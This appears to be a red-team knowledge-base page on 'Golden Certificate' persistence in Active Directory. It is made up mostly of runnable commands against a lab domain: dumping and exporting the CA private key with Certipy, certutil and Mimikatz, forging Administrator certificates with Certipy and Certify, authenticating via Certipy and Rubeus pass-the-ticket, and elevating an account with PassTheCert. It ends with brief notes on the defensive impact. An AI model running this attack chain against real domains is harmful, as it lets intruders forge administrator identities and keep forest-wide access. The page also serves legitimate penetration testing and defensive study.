Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 04. Techniques / Persistence / Techniques

Golden Certificate

Golden Certificate abuse starts when the CA private key is compromised. With the CA signing key, we can forge certificates offline for arbitrary principals trusted by the domain.

Dump CA backup with Certipy

certipy ca -backup -u 'Administrator@ootw.local' -p 'Password123!' -ca 'OOTW-CA' -target 10.10.10.200

Export CA certificate from Windows

$Serial = "CERT_SERIAL"
certutil -store my
certutil -exportPFX my $Serial ca.pfx

Export with Mimikatz

mimikatz.exe "privilege::debug" "crypto::certificates /systemstore:local_machine /export" "exit"

Forge certificate with Certipy

certipy forge -ca-pfx OOTW-CA.pfx -upn administrator@ootw.local -out administrator_forged.pfx

Forge certificate with Certify

$AdminSid = "ADMINISTRATOR_SID"
Certify.exe forge --ca-cert .\OOTW-CA.pfx --upn Administrator --subject "CN=Administrator,CN=Users,DC=ootw,DC=local" --sid $AdminSid --crl ldap:///CN=OOTW-CA,CN=dc01,CN=CDP,CN=Public Key Services,CN=Services,CN=Configuration,DC=ootw,DC=local

Authenticate

certipy auth -pfx administrator_forged.pfx -domain ootw.local -dc-ip 10.10.10.200
export KRB5CCNAME=administrator.ccache

Use Rubeus

$ForgedCertB64 = "FORGED_CERT_B64"
Rubeus.exe asktgt /user:Administrator /domain:ootw.local /certificate:$ForgedCertB64 /ptt

Extract cert and key for Schannel

certipy cert -pfx administrator_forged.pfx -nokey -out administrator.crt
certipy cert -pfx administrator_forged.pfx -nocert -out administrator.key

PassTheCert example

python3 passthecert.py -action modify_user -crt administrator.crt -key administrator.key -target student -elevate -domain ootw.local -dc-host dc01.ootw.local

Notes

  • This is persistence against the PKI trust root.
  • Rotating user passwords or krbtgt does not remove the CA private key problem.
  • Treat CA private key exposure as a forest-level incident.